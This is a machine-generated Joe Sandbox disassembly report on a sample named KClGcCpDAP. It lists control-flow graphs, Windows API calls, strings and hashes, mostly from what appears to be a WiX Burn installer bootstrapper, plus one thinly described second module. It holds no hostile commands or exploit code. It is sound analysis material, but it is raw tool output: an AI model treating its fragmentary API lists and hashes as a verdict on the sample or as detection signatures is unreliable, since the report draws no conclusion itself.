                                                            control_flow_graph 1408 d1e7b4-d1e7f1 1409 d1e813-d1e834 RegisterClassW 1408->1409 1410 d1e7f3-d1e807 TlsSetValue 1408->1410 1412 d1e836-d1e840 GetLastError 1409->1412 1413 d1e86e-d1e8a5 CreateWindowExW 1409->1413 1410->1409 1411 d1e809-d1e80e 1410->1411 1416 d1e93d-d1e953 UnregisterClassW 1411->1416 1417 d1e842-d1e84b 1412->1417 1418 d1e84d 1412->1418 1414 d1e8a7-d1e8b1 GetLastError 1413->1414 1415 d1e8dc-d1e8f0 SetEvent 1413->1415 1419 d1e8b3-d1e8bc 1414->1419 1420 d1e8be 1414->1420 1421 d1e91c-d1e927 KiUserCallbackDispatcher 1415->1421 1417->1418 1422 d1e854-d1e869 call d03821 1418->1422 1423 d1e84f 1418->1423 1419->1420 1424 d1e8c0 1420->1424 1425 d1e8c5-d1e8da call d03821 1420->1425 1426 d1e8f2-d1e8f5 1421->1426 1427 d1e929 1421->1427 1433 d1e935-d1e93c call d40237 1422->1433 1423->1422 1424->1425 1425->1433 1431 d1e8f7-d1e906 IsDialogMessageW 1426->1431 1432 d1e92b-d1e930 1426->1432 1427->1416 1431->1421 1435 d1e908-d1e916 TranslateMessage DispatchMessageW 1431->1435 1432->1433 1433->1416 1435->1421
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,?), ref: 00D1E7FF
                                                            • RegisterClassW.USER32(?), ref: 00D1E82B
                                                            • GetLastError.KERNEL32 ref: 00D1E836
                                                            • CreateWindowExW.USER32(00000080,00D59E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00D1E89D
                                                            • GetLastError.KERNEL32 ref: 00D1E8A7
                                                            • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00D1E945
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                            • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                            • API String ID: 213125376-288575659
                                                            • Opcode ID: 260608234feec4334983d0c7932cb58931dd4b64db517082519f672c085b2255
                                                            • Instruction ID: cbce3fa0ca92b252117cb691f0faf8cc72e452b222f137dd5532b2b7ec9938af
                                                            • Opcode Fuzzy Hash: 260608234feec4334983d0c7932cb58931dd4b64db517082519f672c085b2255
                                                            • Instruction Fuzzy Hash: 52418176900215FBDB209FA5EC49ADEBFB8EF09760F144126FD05EA290DB70D9448BB0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1518 d0c28f-d0c2c1 1519 d0c2c3-d0c2e1 CreateFileW 1518->1519 1520 d0c32b-d0c347 GetCurrentProcess * 2 DuplicateHandle 1518->1520 1523 d0c383-d0c389 1519->1523 1524 d0c2e7-d0c2f1 GetLastError 1519->1524 1521 d0c381 1520->1521 1522 d0c349-d0c353 GetLastError 1520->1522 1521->1523 1525 d0c360 1522->1525 1526 d0c355-d0c35e 1522->1526 1529 d0c393 1523->1529 1530 d0c38b-d0c391 1523->1530 1527 d0c2f3-d0c2fc 1524->1527 1528 d0c2fe 1524->1528 1531 d0c362 1525->1531 1532 d0c367-d0c37f call d03821 1525->1532 1526->1525 1527->1528 1533 d0c300 1528->1533 1534 d0c305-d0c318 call d03821 1528->1534 1535 d0c395-d0c3a3 SetFilePointerEx 1529->1535 1530->1535 1531->1532 1549 d0c31d-d0c326 call d40237 1532->1549 1533->1534 1534->1549 1538 d0c3a5-d0c3af GetLastError 1535->1538 1539 d0c3da-d0c3e0 1535->1539 1540 d0c3b1-d0c3ba 1538->1540 1541 d0c3bc 1538->1541 1542 d0c3e2-d0c3e6 call d21741 1539->1542 1543 d0c3fe-d0c404 1539->1543 1540->1541 1546 d0c3c3-d0c3d8 call d03821 1541->1546 1547 d0c3be 1541->1547 1552 d0c3eb-d0c3ef 1542->1552 1556 d0c3f6-d0c3fd call d40237 1546->1556 1547->1546 1549->1543 1552->1543 1555 d0c3f1 1552->1555 1555->1556 1556->1543
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00D0C47F,00D05405,?,?,00D05445), ref: 00D0C2D6
                                                            • GetLastError.KERNEL32(?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C2E7
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?), ref: 00D0C336
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C33C
                                                            • DuplicateHandle.KERNELBASE(00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C33F
                                                            • GetLastError.KERNEL32(?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C349
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C39B
                                                            • GetLastError.KERNEL32(?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C3A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                            • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                            • API String ID: 2619879409-373955632
                                                            • Opcode ID: e330c1bea43905ecaba73b5137bc000954afbbd1b9c3d6bfd2bcafd70374c5d5
                                                            • Instruction ID: c4aead77b5c688cd8ccff462f03e132d4facaefc21a33cda4d52a3df21134877
                                                            • Opcode Fuzzy Hash: e330c1bea43905ecaba73b5137bc000954afbbd1b9c3d6bfd2bcafd70374c5d5
                                                            • Instruction Fuzzy Hash: C041D876160201ABDB209F298C49F1B7BA9EBD5720F258129FD18DB3D1D771C801DB70

                                                            Control-flow Graph
                                                            APIs
                                                              • Part of subcall function 00D03838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D03877
                                                              • Part of subcall function 00D03838: GetLastError.KERNEL32 ref: 00D03881
                                                              • Part of subcall function 00D44A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00D44A9D
                                                            • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00D42B41
                                                            • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00D42B61
                                                            • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00D42B81
                                                            • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00D42BA1
                                                            • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00D42BC1
                                                            • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00D42BE1
                                                            • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00D42C01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast$DirectorySystem
                                                            • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                            • API String ID: 2510051996-1735120554
                                                            • Opcode ID: 49bca94655cf33cecfcf8ec79329cc74eca0e7b7f4e7c3765120ed556e3b6d33
                                                            • Instruction ID: c635043ddb248c8a896c6deefd9f49f40852992dccc6d945fceaaf73477dc5fc
                                                            • Opcode Fuzzy Hash: 49bca94655cf33cecfcf8ec79329cc74eca0e7b7f4e7c3765120ed556e3b6d33
                                                            • Instruction Fuzzy Hash: 80319070941709EFDB119FA0ED02B697BA4F724769F44017BE404DA270E7F248899F74
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00D43609,00000000,?,00000000), ref: 00D43069
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D2C025,?,00D05405,?,00000000,?), ref: 00D43075
                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D430B5
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D430C1
                                                            • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00D430CC
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D430D6
                                                            • CoCreateInstance.OLE32(00D6B6B8,00000000,00000001,00D4B818,?,?,?,?,?,?,?,?,?,?,?,00D2C025), ref: 00D43111
                                                            • ExitProcess.KERNEL32 ref: 00D431C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                            • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                            • API String ID: 2124981135-499589564
                                                            • Opcode ID: d1594a7b2d184b468606eedc120e8b721fc0001cc3adf26dd0c1dbe5468deb05
                                                            • Instruction ID: 74c24571c44a7984d01aa4f7d9e0566b6b53d864c760d3d13cd74d2cb2ed9a0b
                                                            • Opcode Fuzzy Hash: d1594a7b2d184b468606eedc120e8b721fc0001cc3adf26dd0c1dbe5468deb05
                                                            • Instruction Fuzzy Hash: 6041CD35B00315ABDB20DFACC845BAEBBA8EF45720F154169E901EB350DBB1DE408BB0
                                                            APIs
                                                            • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00D3FCD6
                                                            • GetProcAddress.KERNEL32(SystemFunction041), ref: 00D3FCE8
                                                            • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00D3FD2B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D3FD3F
                                                            • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00D3FD77
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D3FD8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast
                                                            • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                            • API String ID: 4214558900-776468437
                                                            • Opcode ID: 01139f9f1962c065d10156a9af8f38a2f5c645de9a87a55e30b1b09b714b4ba4
                                                            • Instruction ID: 39f68d5c5d4ef50586bf50e8420a885294d2ac09ab72924d578a4b5821b13c8e
                                                            • Opcode Fuzzy Hash: 01139f9f1962c065d10156a9af8f38a2f5c645de9a87a55e30b1b09b714b4ba4
                                                            • Instruction Fuzzy Hash: 22216536D4133A9BC7219B55BD0D7966A94AB10B71F1A0133EC01E73A0EBE4DC85DAF4
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00D0C3EB,?,00000000,?,00D0C47F), ref: 00D21778
                                                            • GetLastError.KERNEL32(?,00D0C3EB,?,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D21781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorEventLast
                                                            • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                            • API String ID: 545576003-938279966
                                                            • Opcode ID: ce9b0eaea214395aa4fd4835cb006c3d3e6f5025e9fba9a4742bc3a4d5137d17
                                                            • Instruction ID: e816fa17e976d1944d4313df1017b2f34c9af20496a537788ab0674be52f545c
                                                            • Opcode Fuzzy Hash: ce9b0eaea214395aa4fd4835cb006c3d3e6f5025e9fba9a4742bc3a4d5137d17
                                                            • Instruction Fuzzy Hash: E2210E7FD417367BD7211AA95C85F27A95CEF307B5B128222BD44BB280E750DC0489F1
                                                            APIs
                                                            • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00D208F2
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00D2090A
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00D2090F
                                                            • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00D20912
                                                            • GetLastError.KERNEL32(?,?), ref: 00D2091C
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00D2098B
                                                            • GetLastError.KERNEL32(?,?), ref: 00D20998
                                                            Strings
                                                            • Failed to add virtual file pointer for cab container., xrefs: 00D20971
                                                            • <the>.cab, xrefs: 00D208EB
                                                            • Failed to open cabinet file: %hs, xrefs: 00D209C9
                                                            • cabextract.cpp, xrefs: 00D20940, 00D209BC
                                                            • Failed to duplicate handle to cab container., xrefs: 00D2094A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                            • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                            • API String ID: 3030546534-3446344238
                                                            • Opcode ID: 5f2b84c48acbca619d8af1fd2c2d2ff2d87e6da4438874e11ff65c37941938e2
                                                            • Instruction ID: b90c5c2360ab4e9aa682d9a141d1def56750f95088ed79875930473f7819d1fe
                                                            • Opcode Fuzzy Hash: 5f2b84c48acbca619d8af1fd2c2d2ff2d87e6da4438874e11ff65c37941938e2
                                                            • Instruction Fuzzy Hash: 9431EF36941235BBEB205B989C49F9ABE6CEF15765F150212FE09BB282D7619D00CEF0
                                                            APIs
                                                              • Part of subcall function 00D13AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00D13FB5,feclient.dll,?,00000000,?,?,?,00D04B12), ref: 00D13B42
                                                            • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00D04B12,?,?,00D4B488,?,00000001,00000000,00000000), ref: 00D1404C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseSleep
                                                            • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                            • API String ID: 2834455192-2673269691
                                                            • Opcode ID: 12edf4d229c0e06d432dc84088b86d6c94081b3f6e9280701eca8a945ccf519a
                                                            • Instruction ID: 296a986c3605d454ac1ecf3cc4d79a8d98c221db5ee0f89a091535491747c98e
                                                            • Opcode Fuzzy Hash: 12edf4d229c0e06d432dc84088b86d6c94081b3f6e9280701eca8a945ccf519a
                                                            • Instruction Fuzzy Hash: EF618C71A00615BFDF229F64EC46BAA7BA8EF14390B194165FD05DB180EF70EDD086B1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000001,?,00000000,00D05445,00000006,?,00D082B9,?,?,?,00000000,00000000,00000001), ref: 00D06DC8
                                                              • Part of subcall function 00D056A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00D06595,00D06595,?,00D0563D,?,?,00000000), ref: 00D056E5
                                                              • Part of subcall function 00D056A9: GetLastError.KERNEL32(?,00D0563D,?,?,00000000,?,?,00D06595,?,00D07F02,?,?,?,?,?), ref: 00D05714
                                                            • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00D082B9), ref: 00D06F59
                                                            Strings
                                                            • Failed to find variable value '%ls'., xrefs: 00D06DE3
                                                            • variable.cpp, xrefs: 00D06E4B
                                                            • Setting string variable '%ls' to value '%ls', xrefs: 00D06EED
                                                            • Setting hidden variable '%ls', xrefs: 00D06E86
                                                            • Setting numeric variable '%ls' to value %lld, xrefs: 00D06EFA
                                                            • Failed to insert variable '%ls'., xrefs: 00D06E0D
                                                            • Attempt to set built-in variable value: %ls, xrefs: 00D06E56
                                                            • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00D06ED0
                                                            • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00D06F6B
                                                            • Failed to set value of variable: %ls, xrefs: 00D06F41
                                                            • Unsetting variable '%ls', xrefs: 00D06F15
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                            • API String ID: 2716280545-445000439
                                                            • Opcode ID: 5bf276bf4153575014ec1e6b96177a2a6b566a89c16c9468b31654ec56c3b349
                                                            • Instruction ID: e2dd732fe064aa19294e940e7bdfad2776c5d7d94ce21a1df3b8eca697060b5e
                                                            • Opcode Fuzzy Hash: 5bf276bf4153575014ec1e6b96177a2a6b566a89c16c9468b31654ec56c3b349
                                                            • Instruction Fuzzy Hash: 1B51E171A40226ABDB309F29DC8AF6B3FA8EF55714F144019F84C6A2C2C275D860CAB1
                                                            APIs
                                                            • IsWindow.USER32(?), ref: 00D04C64
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D04C75
                                                            Strings
                                                            • Failed while running , xrefs: 00D04C2A
                                                            • Failed to open log., xrefs: 00D04B18
                                                            • Failed to set layout directory variable to value provided from command-line., xrefs: 00D04C06
                                                            • Failed to create the message window., xrefs: 00D04B98
                                                            • WixBundleLayoutDirectory, xrefs: 00D04BF5
                                                            • Failed to check global conditions, xrefs: 00D04B49
                                                            • Failed to set registration variables., xrefs: 00D04BDE
                                                            • Failed to set action variables., xrefs: 00D04BC4
                                                            • Failed to query registration., xrefs: 00D04BAE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: MessagePostWindow
                                                            • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                            • API String ID: 3618638489-3051724725
                                                            • Opcode ID: 98be97307519f7deae03366ddc7843fd905eaea7028f3ac5ca9687c392abd80e
                                                            • Instruction ID: 632dcc4cb20e6fea653c55ec1d92980df9c98ee42bfbc141fd13e4fc2a68b50c
                                                            • Opcode Fuzzy Hash: 98be97307519f7deae03366ddc7843fd905eaea7028f3ac5ca9687c392abd80e
                                                            • Instruction Fuzzy Hash: DE4108B1A0161ABFDB265A70CD45FBAB66CFF00760F044216FA09A61D0DBB0EC5497F4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                             • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmp
                                                             • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmp
                                                             • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp
                                                             • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmp
                                                             • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmp
                                                             • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmp
                                                             • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressModuleProcProcess$AllocCreateExitFileHandleLocalNameObjectSingleSleepWait
                                                            • String ID: D$\
                                                            • API String ID: 2086907916-468123767
                                                            • Opcode ID: e6b0d5e5df04b4c669bc546e22e3414ee82adeb29160eb38878878d683b9f2e0
                                                            • Instruction ID: f6b2e1f17b7bc4a41cfdc51b5da142bb2ddf1a008f5458e4e1d7906867984596
                                                            • Opcode Fuzzy Hash: e6b0d5e5df04b4c669bc546e22e3414ee82adeb29160eb38878878d683b9f2e0
                                                            • Instruction Fuzzy Hash: A94119F18197118FD750AF68D68832EBBF1FF95304F00891DE98887294E7B99458CB92
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00D0548E,?,?), ref: 00D1EA9D
                                                            • GetLastError.KERNEL32(?,00D0548E,?,?), ref: 00D1EAAA
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00D1EB03
                                                            • GetLastError.KERNEL32(?,00D0548E,?,?), ref: 00D1EB10
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00D0548E,?,?), ref: 00D1EB4B
                                                            • CloseHandle.KERNEL32(00000000,?,00D0548E,?,?), ref: 00D1EB6A
                                                            • CloseHandle.KERNELBASE(?,?,00D0548E,?,?), ref: 00D1EB77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                             • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                             • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                            • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                            • API String ID: 2351989216-3599963359
                                                            • Opcode ID: c7cf015684ecbdb8fef1544d54c6eb2bd723ec11f3037dba2e565715e537619b
                                                            • Instruction ID: 5a67db2e153f4beee3de9867690b60cfbe4597c28377d82a1df62e0ce9fd32a1
                                                            • Opcode Fuzzy Hash: c7cf015684ecbdb8fef1544d54c6eb2bd723ec11f3037dba2e565715e537619b
